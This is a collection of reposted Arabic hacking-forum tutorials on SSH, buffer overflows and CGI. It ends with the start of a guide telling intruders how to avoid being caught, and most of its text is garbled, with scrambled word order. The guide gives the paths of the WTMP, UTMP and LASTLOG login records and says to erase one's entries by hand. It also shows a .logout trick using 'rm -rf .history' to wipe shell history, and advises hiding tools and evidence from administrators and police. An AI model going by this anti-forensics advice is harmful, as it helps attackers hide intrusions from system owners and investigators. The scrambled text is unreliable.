جداا هامه اداه هى و ورك النت فى اداه الى نتطلع سوف اليومهى االداه هذه و االنترنت على السرفرات معظم تستخدمها
ال Secure Shellال :: SSh اى
عنها الحديث االن لنبدأ :: و
ال هى ؟ SSh ما===============
( secure shellال او ) كمبيوتر الى الدخول و لالتصال برنامج اداه هىهذا داخل معينه مهام او اوامر لتنفيذ ورك النت على اخر جهاز
بعد عن االتصال هو و اى تستخدم remotely connection الجهاز وقوى توثيق تقدم هى و اخر الى كمبيوتر من الملفات نقل فى ايضا
كبديل تعتبر هى و امنه الغير االتصال قنوات فى جداا امن اتصال ويونكسمثل لنفسالغرضفى تستعمل الدوات جداا rlogin,rsh( جيد
and rcp(.ال ايضا تقدم ال secure shell و اتصاالت لشحنات جداا امن اتصال
tcp كونيكشن .
هو :: السؤال و مهم سؤال يأتى هنا :: و
ال استخدام يفضل التى secure shell لماذا االخرى االدوات علىعليها يونكس r- commands يطلق فى
========================================================================================
؟ االعلى فى كالمذكورين======================
ال اليونكسمثل توزيعات يطلق BSD* فى التى االدوات تتعرضمن )rlogin,rsh and rcp( مثل r- commands عليها مختلفه انواع الى
اكسيس روت ال يكتسب ان شخصاستطاع لو انه حيث الهجمات)root access( ن فعلها او ما بطريقه الشبكه على التى لالجهزه
بيانات كل الى يدخل ان يمكنه ريموتلى اى فيزيائى اتصال طريقبالروت يستطيع النه صعوبه ادنى بدون الشبكه على التى االجهزه
اى يونكسبدون فى المذكوره من اداه اى خالل من يعبر اكسسانالشخص بأن يسمى ما هذا و معينه بطرق تفاديها يمكنه و صعوبه
و unauthorized access to systems لديه االن فهمتونى انكم اعتقدكل يلتقط و ترافيك ورك النت و يراقب ان شخص الى ايضا يمكن
على الباكيدجستحتوى هذه تكون و شبكتك خالل الباكيدجسمنشبكتك حق الباسوردسللسيستم
فى: حقيقيه طريقه هى ترافيك ورك النت مراقبه طريقه ملحوظهبند تحت تقع و الكبرى المنظمات اختراق فى تستخدم و االختراق
لالختراق االعداد و االثر ) تقفى
مع هنا تظهر شيل السيكيور مزايا و شيل السيكيور الى نعود االن والشخص يطالب شيل يونكسفالسيكيور فى االدوات عيوب كل
ال اى عبره موثوق اتصال يتصل بأن اكسسايضا الروت لديه الذىال و بالباسورد اال الشبكه اجهزه بيانات الى للدخول الحق يعطيه
ال على التحايل تمكن sshيمكن لو حتى بذلك و النقطه هذه فىعلى االطالع يستطسع اكسسلن الروت اكتساب الشخصمن
الشبكه بياناتب . authorized access to systems اال
مراقبه طريق عن اختراقك احد حاول اذا ان هى الثانيه النقطه وتحمل الباكيدجسالتى التقاط و لشبكتك ترافيك وررك النت
يرسل ال شيل السيكيور الن امله فسيخيب باسورداتك و معلوماتكو يونكساالخرى ادوات ترسلها كما واضحه صوره فى الباسوردات
فك محاوله المخترق على سيكون لذلك و مشفره يرسلها لكنالخ و الشفره
ال يخلى لم المزايا هذه كل مع لكن و secure shell و الثغرات مناكسس الرووت الى يحتاج معظمها تقريبا و قليال ثغراته تعتبر لكن
و ) بينى كالم هذا بها فقط شل السيكيور تخترق ان يمكن االخرى وبينكم(
اخر سؤال االن :: و
ال منها تحمى التى الهجوم انواع هى ؟ ssh ما===========================================
ال -1 من بى ip spoofing تحمى االى عنواين انتحال من تحمى اى
موثوق انه يظهر بى اى باكيدجسمن شخصما ارسل لو انه حيثال يكشفه به ليسموثوق الحقيقه فى لكنه و ايضا ssh به تحمى واى ssh ال المحليه الشبكه على المنتحلين . localy من
ال -2 يسمى مما DNS spoofing تحمى
الباسوردات -3 عليها مخزن يكون التى التيكستس تعترضظهورالهوستس بيانات و الواضحه
شخصغير -4 اى تمنع اى المخزنه البيانات معالجه من تحميكمخزنه داتا الى ايديت عمل من به موثوق
ال فأن هذا كل مع لكن ان ssh و حيث كبيره بدرجه ليسامنال يجعلون ان يستطيعون ورك النت فى كبيره خبره االشخاصذو
ssh اى االتصال عن يكسرو disconnected ينقطع ان يمكن ال لكن وينقلها كان الذى الترافيك تشخيل يعيدون او بياناته . تشفير
كنت اذا فقط تعمل سوف فوق عنها تكلمنا التى االشياء كل ايضا وال بها لك تسمح التى التشفير خاصيه تسمح ssh تستخدم هى و
مثل تشفير نوع من ,three-key triple-DES, DES, RC4-128( بأكثرTSS, Blowfish( اوبشن هناك ايضا و منهم تريد ما استخدام يمكنك
اى التشفير تشغيل بعدم لك تسمح االداه فى خيار encryption "اىof type "none ! ال يجعل هذا الن احمق عليك اقول تجعلنى بهذا وssh الموضوع اول فى ذكرها تم التى االدوات مثل االختراق سهله
ال , يمنع ايضا التشفير هذا ان حيث يونكس ال ip spoofing فى وDNS spoofing التشفير فك مفاتيح تغيير الى باالضافه ايضا هذا و
تماما استعمالها تم التى التدمير مفاتيح تدمير يتم و معينه فتره كل.
ال انها مع االهتمام و االحترام تستحق و مميزه حقا اداه فهى اذنالمجال هذا فى موجود ما افضل لنجعلها لكن و الثغرات من تخلو
مثل اداه على الدرسبالتعرف هذا فى افدتكم قد اكون ان ارجوظنكم حسن عند اكون ان ارجو و شيل .السيكيور
،،،انتهى
الـ " معنى "Buffer Overflows شرح> اإلسالمية الحزم شبكة منتديات من >منقول
>LAMeR :الكاتب<الـ معنى ما درسيشرح لكم وانشالله .. Buffer Overflows اقدم
منه تستفيدون
نبدأ يله
الدرس :محتويات
الـ -1 هو ؟ Buffer Overflow ما
<--------------------------
)Proccess(المعالجه -2<-----------------
الذاكره -3 )Memory management( إدارة<--------------------------------
4- الـ في ماذكر Buffer Overflow استغالل<----------------------------------
المقالة؟ * هذه أقرأ أن قبل أعرف أن يجب ماذالديك تكون ان تحتاج فقط اذن لك اساسي دليل فهذا الكثير،،، ليس
الذاكرة وإدارة الحاسوب برامج بمفهوم أساسية معرفة
1- الـ هو ؟Buffer Overflow ما<----------------------->
Buffer Overflow بمعنى أو سيئة برمجة بسبب لبرنامج تحدث حالةأخطاء تحمل برمجة .اخر
نوع من أستغاللها يمكنك ثغرة تسمى Buffer Overflow احدث، 'code red' فايروس خادم في أستغلت MS- لمايكروسوفت IIS التي
web server -يحدث بحجم Buffer Overflow عموما، متغير ما برنامج يظهر عندما
المثال،حجم ) سبيل على ( 20ثابت إلى خصصت التي القيمة و بايت المتغير حجم من أكبر المتغير .هذه
المثال هذا :خذ: " : األول اسمك إطبع رجاء الجملة هذه الشاشة على برنامجي يظهر
وهي" سيدخلها التي البيانات المستخدم من برنامجي سيأخذ ثم ) تخزن) او برنامجي في فتظهر متغير في توضع ثم األول اسمه . بيانات لتخزين مخصص المتغير كان إذا انه في تكمن هنا المشكلة
يساوي األقصى ) 15حجمها اسم وهي هنا والبيانات بايت حجمها( ان ) 25المستخدم لنا يتضح المتغير في ستخزن التي بايت
حجمه ( من اقل مكان في وضع المستخدم .اسمعن الزائدة للبيانات سيحدث ماذا انها 15اذن المؤكد من بايت
تطفح" االسم "Overflow سـ لمتغير خصصت التي الذاكرة .على
الذاكرة تخصص البرنامج، يبدأ : عندما>var1<>var2<>vname<>Other things in memory<
10b 6b 15b )var 1 وvar 2 المدخل باألسم عالقة لها ليست vname, متغيرات
حجمه الذي بايت 15المتغيرالمستخدم سيدخله الذي االسم سيحتوي الذي )وهو
االسم سيدخل المستخدم ان " نفترضabcabcabcabcabcabcabcabcabc" هكذا الذاكره ستبدو :حينها
somevalue2avalusabcabcabc
abcabcabcabcabcabc>var1 <>var2<>vname <>other things go here<
المتغير ؟؟ حدث ماذا البيانات "overflowed طفح" vname اذا بسببقيمة و المستخدم قبل من عليه other things in memory" المدخلة
" فيض بسبب تغيرت الذاكره في اخرى الحروفمن )overflow(أشياءالمستخدم .ادخال
الخطأ؟؟؟ هذا أستغل كيف اذنالمهمة األساسية بعضاألشياء هناك الجواب، إلى نصل أن قبل
الحاسوب وبنية تركيب حول نعرفها أن علينا يجب . التيلينكس سنناقشنظام المقالة هذه linux في ، مماثل المفهوم لكن
األنظمة .لباقي
:)Proccess(المعالجه-2<---------------->
عملية هي يعمل حاسوب في األساسية الوظيفية الوحدة إن.)Proccess( المعالجه العمليات من العديد هنالك الحاسوب في
من العديد تجعل التي القوة تقسيم عن مسؤول التشغيل ونظامالحاسوب في نفسالوقت في تعمل .العمليات
متعددالعمليات " إسمه شيء صحيح... "Multi- proccesses ليسهناكالمركزية المعالجة وحدة ان اذن؟؛ العمليات )CPU(كيف بين تنتقل
التي المهام من العديد مثل تبدو بحيث كبيره بسرعة حده على كلواحد وقت في ،تعمل
خدع من وهذه واحد وقت في تعمل العمليات كأن لنا تبدو اذاعلينا يؤديها التي الحاسوب ..
عمليةآخرى ألي واليمكن ، الذاكره من فاضي عنوان لها عملية كل . الىشي يرشدنا وهذا الذاكرة من الفاضي المكان هذا في تدخل
وهو تفهمه ان يجب :اخر
3- الذاكره :)Memory management( إدارة<------------------------------>
التشغيل أنظمة -operating systems-تدير افتراضية ذاكرة الحديثةvirtual memory)تخيلية(.
) إلى ) مباشرة الوصول مثال برنامج تطبيق ألي اليمكن بأنه يعني ذلك. لماذا؟؟ الحقيقية الذاكرة
التشغيل تحويل " Operating System انظمة تخطيط جدول تمتلك) ( تخيلية افتراضية عناوين الى الذاكرة من الحقيقية . "العناوينالـ ذاكرة تقوم ( OS وعندما التشغيل )نظام الذاكرة في مكان بتحديد
وليس ، فقط التخيلي العنوان البرنامج ،يأخذ لتشغيله معين لبرنامجالطبيعي .العنوان
) ( من انه وهي التخيلية اإلفتراضية للذاكرة اخر استخدام هنالك وأو ) عملية بكل مباشرة ترتبط ال الحقيقية الذاكرة أن المعلوم
الصلب( القرص على مساحة يستخدم التشغيل فنظام ، برنامج،كذاكرة
الذاكرة ) مكان الذاكرة مكان معرفة أبدا يمكنه ال والتطبيقالصلب ( القرص في للذاكرة المخصصة المساحة ألن ،ذلك الحقيقة
وتتغير .تتبدل
افتراضية :. وذاكرة حقيقة ذاكرة الى تنقسم ال الذاكرة ان توضيحواحد لذاكرة ينتميان أنهما بل
للمتييز هو الجواب ؟؟ وافتراضية حقيقية الى التسمية فائدة ما اذنالقرص من معينة مساحة تمثل الحقيقة الذاكرة ان حيث ، فقط
) حقيقية ) سميت لذلك مستمر تغير في المساحة هذه ومكان الصلبالطبيعية ) الذاكرة لمسمكان بأستطاعتك اي طبيعية اخر بمعنى او
) الصلب القرص على بيدكحقيقي ) غير افتراضي عنوان إعطاء هي اإلفتراضية الذاكرة وفائدة
مساحة( لمكان فقط كأسم عنوان يعطي اي الحقيقية للذاكرة المساحة مكان تغير وإن ، الصلب القرص في الطبيعية الذاكرة
) ( ثابت التخيلي اإلفتراضي العنوان يظل للذاكرة .المخصصة
4- الـ في ماذكر Buffer Overflow استغالل<--------------------------------->
والمرح األهم الجزء إلى نصل اآلنللوصول الذاكرة وإدارة المعالجة عن قلنا الذي من نستفيد كيف
الجذر الى في )Root( والدخول قلنا نحن تذكر النظام؟ وأختراق ) ( أكبر المستخدم من البيانات اإلدخال يكون عندما بأنه سابق وقت
الزائدة البيانات البيانات، لهذه خصصت التي الذاكرة من حجماالمكان )overflow( ستفيض هذا المتغير؟ االسم بعد التي الذاكرة في
األختراق في منه نستفيد الذي المكان هو الذاكرة .من ) ( : يدخلها التي البيانات مكان خط داخل المكان ذلك في نعمل ماذا
يطلبمن ) الذي األول االسم وهو السابق المثال في المستخدمحيث ( للحاسوب، شعبية األكثر األوامر نضع أدخلناه ثم البرنامج قبل
) ( استخدامه نستطيع هيكل ينتج يحدث الحاسوب تجعل األوامر هذه . بهذا القيام المستغل للنظام الكاملة بالسيطرة للقيام بعد فيما
، يعمل كيف معرفة أردت لو إذن لك، يبدو كما ليسبيسطا العملحول القادمة المقالة تقرأ أن يجب Buffer Overflows أنت ، الذي
الـ من واحده كيفإلستغالل بالضبط في Buffer Overflowsسيصف.اإلختراق
ايشمعنى وعرفتوا الدرسزين فهمتوا انكم اتمنى Buffer اخيراOverflow مع مرة من اكثر قرائته يعيد الدرسنصنص فهم واللي
يفهم وانشالله .التدقيق12.
باإلنترنت CGIالـ ".13 " وعالقتها>منقول<
> قبل من >King_abdo:مترجمالـ بعرضمقدمة نقوم الملفسوف هذا عالقتها CGI في و
باالنترنت
للـ )1( CGI مقدمة
CGI=COMMON GATEWAY INTERFACE تسمح التي الواجهة هيالبرامج أو المتصفح طريق عن المستخدم جانب بين باالتصال
بروتوكول يفهم الذي سيرفر الويب جانب و خالفه )HTTP( و
و TCP/IP الـ أي جي السي سكريبت يستخدمه الذي البروتوكول هوالمحددة . البورت االتصال أثناء السيرفر
هي البروتوكول (80لهذا البورت ) هذه تتغير أن الممكن من
و الويب صفحات بتوليد تقوم أن أي جي السي سكريبتات تستطيعيقوم معينه لمدخالت طبقا محددة نتائج أيضا و الصور
بتحديدها أي جي السي مبرمج
أساسيتين خطوتين علي أي جي السي سكريبتات عمل : يقوم
للبيانات -1 أوليه معالجة بعمل السكريبت يقوم األولى الخطوة فيله أدخلت التي
يقوم -2 التي للبيانات كقناه السكريبت يعمل الثانية الخطوة فيالعكس أو السيرفر الي بارسالها المتصفح
من تتمكن حتي البيانات بتشفير أي جي السي سكريبت يقومللعمل مناخ أي في العمل
لغة كانت سواء برمجة لغة بأي أي جي السي سكريبت كتابة يمكنبيسك الفيجوال مثل مجمعة
أن اللغات نوعين بين الوحيد الفرق و البيرل مثل مترجمة لغة أوالبرنامج
اللغات لكن و التنفيذ في أسرع يكون سوف المجمعة باللغة المبرمجالتطوير عملية في أسرع المترجمة
تطويره أو السكريبت تعديل علي تعمل أن أردت اذا للسكريبت
كالتالي هي لموضوعنا الصله وثيقة تعتبر التي األوامر : أهم
1- GET للمتصفح السيرفر من بيانات بطلب يقوم األمر هذا2- POST المدخلة المعلومات قبول السيرفر من يطلب األمر هذا
المتصفح من اليه3- PUT اليه المرسله المعلومات قبول السيرفر من يطلب األمر هذا
حاليا الموجودة المدخالت عن كبديل
الضعف )2( نقاط
في ليسضعفا أي جي السي سكريبت يسببها التي الضعف نقاطلكنه و نفسه أي جي السي
الـ بروتوكول في المختلفة HTTPضعف التشغيل أنظمة في أوهناك لكن و الموجودة الضعف نقاط باستغالل يسمح أي جي السي
النظام تحطيم الي للوصول أخري طرقباستخدام . محمية الغير الملفات الي الوصول يمكن كمثال األمني
.TELNET أو FTP الـ،،،انتهى
أفعالك؟ " وتخفي نفسك تحمي "!كيف> إعصار منتدى من >منقول
> المدمر: >الكاتببسيطه : مقدمه
==========كانت سواء اخطائي تحمل منكم ارجو شئ كل قبل و البدايه في
الجميع .. على الفائده تعميم هو له اسعى ما كل امالئيه او نحويهالي المكانات و المستويات باعل نترقي و العرب نحن نتقدم ان و
.. نستحقهاتكون .. ان ارجو القراءه في ليسبسهل و ليسصغير الموضوع
الموضوع اخر حتى متانيا صبورالظلك .. الفحساب تعمل و خيالك من تخاف سيجعلك الموضوع هذا
تتراجع و تخاف ليسالن و لالمام دفعه سيكون انشاله لكنكل .. .. .. اخر بمعنى دائما نتجنبه ما عادة و غريب الموضوع اسلوب
اختراق في شروحا و دروسا كتبوا من اساتذتنا و اخواننا منمسح هو الحمايه في الوحيد همهم كان المواقع و السيرفرات
! .. log files اللوق سيمنع هذا هل ؟ تام امان في يجعلك هذا هل لكن !! الموضوع قراءة من االنتهاء بعد ستكتشفه ما هذا ؟ اثرك .. تتبع
************************الثغرات ترجمة على الحصول ان تظن كنت باسرع ) exploites ( اذا
لك " اقول بان لي فاسمح متطورا و محترفا يجعلك ما هو يمكن ماغلط تفكيرك اسلوب ان و خاطئ انسان " انك
جدا الحديثه الثغره ستفيدك اذا ) 0day ( ماذا القبضعليك يتم عندماعلى .. السيطره سيتم عندها و ؟ الكبيره السيرفرات احدى هاجمت
؟ ! مراقبتك و ادواتك و !اجهزتكان او ؟ شخصنعرفه قطالي بحدث لم هذا البعضان يرى يمكن
ما !! يوم يحدث قد هذا لكن العاليه التقنيات هذه ليسفيها !! بالدنااخرى سيرفرات انما بلدك سيرفرات فقط التهاجم انت ايضا و
الحرصو .. من البد انه كما الدوليه الشرطه قبل من محميه عالميههكر نفسك تسمي ان تريد كنت اذا االمور بمعنى hacker فهم
الكلمهالنك بكثيير الموضوع هذا قراءة من اكبر انك نفسك في تعتقد ربمالكن .. نفسك في ذلك ترى انك او باالحتراف عنهم المعروفين من
النهايه الي الموضوع لقراءة تحتاج انت و مخطئ بانك لك اؤكد انا************************
الى مقسم اجزاء 8الموضوع : =================
قرائته : ) من باالنتهاء انت قمت ماقد هو و المقدمه االول الجزء حاليا (
تصبح : كيف و العقليه االمور الثاني الجزء " Paranoid "** الجزء هذاالمواضيع هذه خالل من عرضه : سيتمالحافز - او الدافع
تصبح - ان البد ان " Paraniod " لماذاتصبح - ان يمكن ؟ " Paranoid " كيف
؟ - الجديده شخصيتك او الجديد اسلوبك على تحافظ كيف !و
توضيح .. ** سيتم الكلمه هذه معنى عن يتسائل معظمكم ان متاكدانشاله الجزء هذا شرح مع مفهومها و . معناها
تقوم : ان قبل معرفتها عليك يجب التي االساسيات الثالث الجزءالتاليه ) ( النقاط خالل من عرضها سيتم و اختراق عملية باي
تمهيد -نفسك - امن
الخاص - حسابكاللوق - LoGs ملفات
اثر - اي تترك المنها - الحظر و تجنبها يجب اشياء و امور
سيتم : ) و مالحظتها يجب يتي الي الحديثه التقنيات الرابع الجزءالتاليه ( النقاط خالل من عرضه
تمهيد -نوع - اي من اثرك تقفى امنع
اللوق - ملفات انواع من نوع اي من lOGs ايجاد فيها كان مهما .. تالعب
من - syslog configuration and logfile تحققالمثبته - االمن برامج نوعيات من تحقق
المدراء - وجود من Admins تحققتصحيح - يمكن checksum checking software كيف
االمنيه - المستخدم حيل
المراقبه : تحت وضعت ان تفعل ماذا الخامس الجزءعدم : من البد الذي ايضا و به القيام عليك الذي ما السادس الجزء
القبضعليك تم انه حالة في به القياماالختباء : و للتخفي البرامج بافضل قائمه السابع الجزء
بحرضو : ........ الموضوع تتابعو ان ارجو ختاميه كلمه الثامن الجزءاالن من شديدن !!! ... تركيز
************************الثاني : الجز
=======الحافز - و : الدافع
*************التي .. القوه هو العقل عمل اي في للنجاح العقل تحكيم من البد
حريص .. و مسئول واقعي انسان لتصبح تحفزك و ستدفعكو ) Hacker ( المخترق المبادىء هذه فيه تتوفر ان و البد الناجح
الجسم .. يكبر لن الجسم عضالت بناء مثل مثلها العقليه االمكانياتسبيل ) على بذلك الخاصه الرياضه ممارسة بعد اال يتقسم و
المثال (اشد اخذ البد المعلومات من الكثيير لديك او متمرس كنت مهما
شئ باي القيام قبل الحذر و االحتياطات
تصبح - ان يجب ؟ " Paranoid " لماذا***************************
نزعه ) " Paranoia " كلمة االرتياب جنون تعني االنجليزيه اللغه فياالشخاص ( جميع و االمور جميع في تشك تجعلك االفراد عند
الكلمه هذه اصل معرفة بعد لنا تتضح بدات االمور .. اعتقدانالتاليه الكلمات خالل من ذكر نلخضما ان ان paraniod : يمكن تعني
الظروف جميع في الشك و الحذر شديد تصبح
؟ المخيفه الطريقه بهذه الحذر توخي يجب !!لماذاالن .. و امان في تسير يجعلك الظروف اسوء الى دائما توقعك الن
تغير .. انك المجرده بعينك انت تراه ما جدا كبيير شئ هو تفعله ماالسيرفر .. من المعلومات بعض بتحميل تقوم او الرئيسيه الصفحه
جدا سهل و بل بسيط شئ هوالقبض و تتبعك و رصدك تم و معين سيرفر اخترقت انك لو ماذا
! و ! كالسارقين السجن في سترمى انك و ؟ الشرطه قبل من عليكالمجرمين
يصيب .. قد ما بما االهتمام عليك لك يحصل قد بما تهتم ال كنت انمتزوج .. ... .. .. ) ( كنت ان اطفالك و زوجتك اخوتك امك ابوك اهلك
هي .. الحقيقه في لكن جريمه هو به ماتقوم بان التشعر ربما!! جريمه
؟ القبضعليك تم ان سينتظرك ماذا تعرف !هلطبيعيه .. الغيير الناس نظرة الكومبيوتر امور كل من حرمانك سيتم
بفرص ) ( .. تحظى لن خوف نظرة انما اعجاب نظرة ليست لكمن .. اخرى مشاكل اي حصول عند ستسدعى تستحقها التي العمل
ابدا .. ثاني يقومون ال يسقطون من معظم فان لذا النوع !! هذا
نفسك .. امن شكاكا و جدا حذرا فاصبح لذااالحتياطات جميع اخذ
شابه ما او خواف بانك عنك الكثيرون قديقوله بما التهتمملف باي تافهه log اهتم قيمته كانت مهما
سليما .. hacker لتصبح بعملك تقوم ان 100عليك %
تصبح - ؟ " Paranoid " كيف*********************
الشخص هذا اصبحت بالفعل انت به اقتنعت و سبق ما قرأت كنت اذا" Paranoid " وليد التحمسوحده و يكفي ال وحده االقتناع لكن
موجودين ... التوتر و القلق يكون ان البد انما اليكفي ايضا اللحظهااللكترونيه ) ( حياتك في دائم بشكل
تقول ... لمن تعرف ان البد حقيقي هكر تكون ان تريد فعال كنت اذامراقب .. انك حساب اعمل االخرين مع تتعامل كيف و الحقيقه هذه
على .. كالمك في فاحذر دائما وراك خفيه كاميرا هناك انه و دائماو .. الشخصي بريديك حتى او مراقب يكون قد النه الهاتف
المتوقع ) ( الغير حساب تعمل ان البد االلكتروني
هذه .. اسألك دعني مبالي غير انسان انك و يهمك ال ذكرته قد ما اذا؟ االسئله
الدموع و الحزن ترى ان تريد هل ؟ مجرم االخرين يراك ان تريد هل؟ عليك قلوبهم تحسر ان تريد هل ؟ اهلك وجه !على
؟ صحبتك ؟ خطيبتك ؟ اصدقائك تفقد ان تريد هلتعرفه من كل على سيعود انما فقط عليك يعود لن الضرر ان تذكر
؟ - الجديده شخصيتك او الجديد اسلوبك على تحافظ كيف !و******************************************
انسان تكون ان قررت و االن حتى ماذكر استوعبت قد انك بماالوقت .. طوال هكذا تبقى ان البد حريصجدا
االحتياطات : اتخاذ في واحده كسل لحظة الكلمات هذه تذكر و؟ باكملها حياتك تغير قد !!!!االمنيه
الدافع تذكر دائما
الثالث - : الجزء=========
تمهيد -******
اي ممارسة قبل جيدا استيعابها و القادمه االمور هذه معرفة يجبتستوعب .. ان متمرسالبد مخترق كنت لو حتى اختراق عملية
القادمه االفكار
نفسك - : امن***********
ال - قرأ لو ؟ SysAdmin ماذا االلكترونيه البريديه رسائلكقبل - من مراقبه و مسجله الهاتفيه اتصاالتك كانت لو ماذا
؟ الشرطهكل - على السيطره و الشخصي الكومبيوتر ضبط تم لو ماذا
؟ معلوماتك
الهاكرز ايشخصمن مع هاتفيه اتصاالت اي بعمل التقوم كنت اذاتمتلك .. ال و مشبوهه معلومات فيه ايميالت اي تبعث وال الكراكرز او
اي يشكل ال ببساطه فهذا جهازك على حساسه و امنيه معلومات اياو مخترق لست انت ايضا ببساطه النه )= hacker خوف
بهذا المهتمين اصدقائك بين و بينك اتصال وجود من البد النهاالفكار .. و االخبار لتبادل .. المجال
بعض او لالختراق الالزمه الملفات بعض تمتلك انك و البد انه كمالجهازك رصد حدوث حالة في لك مدينه تعبر الي المعلومات
كبسه) ( >----<
حساسه معلومات من تملكه ما كل بتشفير sensitive data قماالنترنت .. على مجانا الموجوده البرامج بعض باستخدام ذلك يمكنك
االول الهاكرز اختيار تعتبر التي و البرامج بافضل قائمه هذه : وSecureDrive 1.4b او SFS v.17 اليكم MsDos لمستخدمين -
نظام - انظمة * ( EnigmaII v1.5 اليكم *Amiga لمستخدمين احدىالعربي عالمنا في خصوصا االستخدام شائعة غير ) التشغيلال - انظمة CFS v1.33 اليكم Unix لمستخدمين
البرامج ) ( هذه اليكم بملف ملف فردي بشكل الملفات لتشفيراداء) ( االحسن و شهره االكثر :
- Triple DES- IDEA
- Blowfish )32 rounds(- file2file
االيميالت : لتشفير- PGP v2.6.x
اتصالكب عملية تشفير ايضا انه ( Unix System يمكنك اساس علىمراقب تكون ان ) ممكن
باستخدام ذلك : و- SSH االن حتى االمن
- DES Login ال .. .. .. شائعه غير منطقيه غير التخمين صعبة السريه كلماتك اجعل
دائما .. تتذكرها ان البد نفسالوقت في لكن القواميس في توجداالحرف .. من ممكن عدد اكبر اجعلها تتمتلكه كتاب من اخترها
من) تتكون سريه كلمه منك يطلب اشتراك اي عمل عند عادة يعني ال ( 8 -4 فاختر حروف 8احرف
يمكنك .. انما اعتيادي بشكل الهاكرز اصحابك هواتف ارقام تحفظ المن ) ( بهم اتصل و فقط انت تفهمها برموز حتى تشفرها بان
العمل من او الشارع .. هواتفكلشئ تشفير من فالبد الهاكينج في جدا متعمق بالفعل انت اذا
االمور بهذه !! يتعلقعلى معلوماتك من احتياطيه نسخه دائما بالطبع HD او CD احفظ و
جهازك على الموجوده المعلومات خسرت اذا حتى مشفره تكوناحتياطيه نسخ لديك يكون
لديك .. كان ان و التحتاجها بملفات او document files التحتفظانما اعتياديا التقطعها اخرى مرة تريدها ال و مطبوعه ملفات
ان او االعتياديه تواجدك اماكن عن البعد كل بعيد مكان في احرقهامشفر او مرمز باسلوب جديد من كتابتها فعليك بها االحتفاظ اردت
انت اال !! اليعرفه
ان الممكن من انه تعرف : هل=================
انهم : , , و اخرون هاكرز المخابرات الشرطه من مراقب تكونتخيلها اليمكن حديثه وسائل باستخدام حركات كل رصد يتسطيعون
: مثلاالمتار - مئات بعد عند تصويرك تستطيع تصوير اجهزه
مكالماتك - على للتصنت غرفتك نحو مصوبه ليزر نقطةال - على يديك صوت و لمسات على للتنصت التردد عالية موجات
keyborad !!اخرى .. الى دوله من و الخر مكان من االمكانيات هذه بالطبع تختلف
يخبئ !!! ماذا تعرف ال انت لكن مبالغه اقوله فيما انه البعض يرى واالن !! من التستعد فلماذا المستقبل !!! لك
بالفعل الذي الخارج دول في العرب اخواننا من الكثيير هناك انه كماالمصري ... " المثل راي على و هذه التنصت اجهزة فيها تتوفر
حركاتك " و احتياطيا كنت فكلما فيك عدوك يحتار عدل امشيجدا !!! قليله ففرصاطاحتك صحيح بشكل تحسبها
الشخصيه اشتراكات و : حساباتك===================
\ \ المدرسه العمل في كانت سواء الشخصيه حساباتك عن سأتكلم هنابالتالي\ فعليك كان اي : الجامعه
الشخصيه .. - بحسابتك مشبوه او قانوني غيير عمل باي تقوم ال ابداعنك كامله تفصيالت و هويتك و الحقيقي اسمك يكون فيها التي
ال - بواسطة اختراقه تم قد بموقع تتصل ان تحاول ما telnet عمركامني - موقع الي البريد قائمة الخاصفي بحسابك االشتراك يمكنك
security خوف دون .. من
انها - او تشفر ان البد ملفات من بالهاكينج مختص هو مو كل لكنفورا مسحها يتم
في - الهارديسك على االختراق ادوات و برامج اي تحفظ ال ابداالشخصي حسابك
عمياء - ثقه فيه تثق لمن اال التعطيه الحقيقي !!!! بريدكبعكس .. - االهتمام انما مشبوها يجعلك ال بالسكيورتي اهتمامك
الهاكينج ==< المشكله هو السكيورتي
>----اللوق : LoGS ملفات
============جدا 3هناك مهمه ملفات :
- WTMP الخروج و الدخول عند log on/off - log in/logout ( للتسجيل+ tty + host (
- UTMP حاليا اونالين ! للمتواجدين- LASTLOG هذه جاءت اين من logins تسجيل
من ) ** اخر جزء في بعد فيما تعمق و باستفاضه عنهم سنتكلم نفسالموضوع (
ال بواسطة دخول عملية في telnet , ftp , rlogin كل تسجيلها يتمسيتم .. اال و الملفات هذه من دخولك حذف البد الملفات هذه
االتي : معرفةباالختراق - قمت !! ماذاقادم - انت مكان اي من
اونالين - بقيت الوقت من .. كم
بنسبة الجميع فيه يقع نفس % ) 99.9خطا في اقع كنت انا حتى مننا اللوقات .. ( تمسح انك هو و اتعلمت لكن زمان الخطا logfiles هذا
انه .. االدمين يعرف بان التهتم انك حالة في مجدي هذا علطولشغل .. تشتغل ان اردت اذا اما النظام على دخل قد ما مخترق هناك
ايشخص .. يالحظك ان دون الخروج و الدخول عليك المحترفينالنظام مدير انتباه يلفت شئ اي بتغيير تقوم ان دون
معي تابع ذلك لعمل : وتقوم انما اللوق بمسح التقوم انها على روجت التي البرامج التعتمد
برنامج مثل مجديه غيير فهي دخولك ZAP )or ZAP2 بحذفعلى دليل ايضا هذا و انت مكانك لوق كاخر اصفار بعمل يقوم النه
النظام مدير سيالحظه خطا وجوديدويا بذلك بالقيام عليك .. اذا
تكوت ان البد ال root عادة في تعدل و باستثناء ( log files لتغيرجدا القديمه التوزيعات ) بعض
اللوق ملفات تواجد التوزيع ( default اماكن باختالف ) تختلفUTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/logWTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log
LASTLOG : /usr/var/adm or /usr/adm or /var/adm or /var/logالقديمه النسخ بعض في $home/.lastlog و
اثرا تترك : ال=======
ملفات من دخولهم حذف عملية في ينجحون الهاكرز من كثيير
توجد .. !!! التي الملفات هي و قاتال و هاما امرا ينسون لكنهم اللوقهنا
/tmp and $HOMEال جود كبيير $HOME في Shell History و قلق : مصدر
History files :sh : .sh_history
csh : .historyksh : .sh_history
bash: .bash_historyzsh : .history
Backup Files :dead.letter, *.bak, *~
ال لمسح ايضا موجود الحل : History filesلكنmv .logout save.1
echo rm -rf .history<.logoutecho rm -rf .logout<<.logout
echo mv save.1 .logout<<.logout
منها - الحظر و تجنبها يجب اشياء و امور======================
على اال باسورد اي بكسر ابدا عليك encrypted partition التقوم كماعلى ) الجامعه اشتراك اشتراكاتك استخدام من تحذر انت دائما
المثال ( سبيلالشبكه مدير ماتفعله يرى ان يمكن البساطه بمنتهى و admin النه
الخ تستخدمها التي الملفات و به تقوم مالذي سيعرف ثم .. مناحنا يعني لديك المشبوهه البرامج اسامي تغيير ان دائما حاول
الفاضي على مخيفه اسامي اسماء نسمي غاويين خصوصا .. العرببعضاالشتراكات .. تستخدم ان حين يعني فقط نفسك في التفكر
ال الخلفي shellsاو بالعمل تسمح تعرف background التي ان البداالنظار تلفت بالتالي و السيرفر سرعة من تبطئ !!! انك
التستخدم ان سبيل ... parametres حاول على المستطاع قدر علىاو معين لموقع تيلنت على الشيل من تتصل ان اردت اذا المثال
